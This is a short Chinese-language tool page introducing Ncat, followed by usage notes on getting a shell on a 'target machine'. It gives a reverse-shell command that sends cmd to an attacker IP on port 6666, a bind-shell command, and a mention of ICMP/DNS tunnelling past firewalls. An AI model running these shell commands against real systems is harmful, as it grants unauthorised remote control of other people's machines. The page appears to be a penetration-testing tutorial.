Ncat

工具地址

Ncat

工具介绍

Ncat 是一款功能丰富的网络实用程序，可通过命令行跨网络读写数据。Ncat 是为 Nmap 项目编写的，是对经典Netcat的改进版重新实现。它使用 TCP 和 UDP 进行通信，旨在成为一个可靠的后端工具，为其他应用程序和用户提供即时网络连接。Ncat 不仅支持 IPv4 和 IPv6，还能为用户提供几乎无限的潜在用途。

Ncat 拥有众多功能，其中包括：支持 Ncat 链式连接、将 TCP 和 UDP 端口重定向到其他站点、支持 SSL 以及通过 SOCKS4 或 HTTP（CONNECT 方法）代理建立代理连接（并可选配代理身份验证）。一些通用原则适用于大多数应用程序，因此您可以立即为通常不支持网络支持的软件添加网络支持。

搭建流程

下载

使用方法

1. 目标机器有入站策略只允许特定端口连接，可以采用反向连接
   反向连接：目标机器主动给出去，攻击机来监听

# 目标机器绑定自己CMD到攻击机IP的6666端口
nc -e cmd 47.239.118.154 6666

# 攻击机等待6666连接
nc -lvvp 6666

2. 目标机器有出站策略，不允许出去，采用正向连接
   正向连接：本地监听等待对方连接

# 目标机器绑定CMD到自己本地6666端口
nc -e cmd -lvvp 6666

# 攻击机主动连接目标机器6666端口
nc 8.217.55.197 6666

3. 目标机器有出入站策略，采用其他协议隧道
   ICMP, DNS等隧道技术